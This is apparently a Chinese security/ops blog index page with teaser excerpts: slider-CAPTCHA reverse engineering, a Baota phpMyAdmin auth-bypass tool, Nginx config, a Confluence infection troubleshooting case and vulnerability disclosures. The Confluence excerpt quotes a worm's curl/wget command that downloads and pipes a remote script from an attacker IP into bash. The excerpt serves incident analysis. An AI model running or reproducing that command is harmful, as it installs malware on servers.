51工具盒子
记一次查询网站备案中滑块验证码的逆向分析
近期闲来无事,正好拿这个滑块验证码练练手,顺便打发打发时间 当我们进行网站查询时,会触发下面的验证码 [![Snipaste_2023-11-19_21-18-57.jpg]()](https://illusory.cn/usr/uploads/2023/11/803885002.jpg#vwid=858&vhei=455) Snipaste_2023-11-19...
最新发布
宝塔系统未鉴权导致phpmyadmin任意登入利用工具
本文章,工具来自YanXia,转载请注明作者信息,博客地址<http://www.535yx.cn>,感谢 {#%E6%9C%AC%E6%96%87%E7%AB%A0%EF%BC%8C%E5%B7%A5%E5%85%B7%E6%9D%A5%E8%87%AAYanXia%EF%BC%8C%E8%BD%AC%E8%BD%BD%E8%AF%B7%E6%B3%A8%E6%9...
宝塔禁止下载指定后缀的文件,如log文件和txt文件
Nginx方法 ======= 在对应网站的配置文件中添加如下代码 ```lang-bash location ~* \.(txt|log)$ { deny all; } ``` 如下图:  建议配置:香港软银BGP,首月仅需3.3元。 *后来发现原来支持。。* 2.shell脚本执行PHP文件时,**文件内**的路径要填全部路径 /www/wwwroot/illusory.cn/ 否则不能读取成功! 3.shell脚本执行PHP命令 php -q /www/wwwroot/illusory.cn/index.php 发出来帮大家避雷,处理这三个问题花了我一下午...
宝塔 Openssl问题
用file_get_contents()函数,访问自己的网站竟然失败了。。 错误代码: OpenSSL Error messages: error:14090086... 然后去网上搜,发现啥方法也不管用。。 最后发现是自己网站的证书有问题,所以失败了。。 所以,如果用这个函数来https访问自己的网站失败的话,说明是网站证书有问题,而不是php.ini里面ope...
confluence 漏洞中毒 排查案例
**现象:** 新接手的一台wiki服务器, 听同事说,机器中过病毒,没清理干净,还是有问题的。 我总结了几次规律。 每次到周二上午的时候,服务器CPU 爆满, 导致其他服务终止, SSH登录就出现问题。 问题: 2023年8月29日上午9点10分 周二 1. 进程里有有个kk.x86的进程 2. 有一个/tmp/kk.x86的文件 3. MySql会挂掉 ...
confluence 漏洞
高危蠕虫下载命令执行(wget\&curl) 命令行 bash -c (curl -s 194.38.22.53/cf.sh||wget -q -O- 194.38.22.53/cf.sh)|bash 父进程命令行 /opt/atlassian/confluence/jre//bin/java -Djava.util.logging.con...
Diffie-Hellman Key Agreement Protocol 资源管理错误漏洞(CVE-2002-20001)
Diffie-Hellman Key Agreement Protocol 资源管理错误漏洞(CVE-2002-20001) ### 漏洞描述: Diffie-Hellman Key Agreement Protocol是一种密钥协商协议。它最初在 Diffie 和 Hellman 关于公钥密码学的开创性论文中有所描述。该密钥协商协议允许 Alice 和 Bob 交换公钥值...
【漏洞已修复】永劫无间客户端RCE漏洞
0x00前言 {#0x00%E5%89%8D%E8%A8%804953} ==================================== 相信大家之前都看过我博客这篇添加了密码。距离发现这个漏洞已经一年多了, 这个漏洞现在已经修复了遂把他公开出来给大家学习一下。其实蛮简单的\~\~\~ (PS:本文单纯讲漏洞。不涉及实战利用) 0x01 正文 {#0x01...
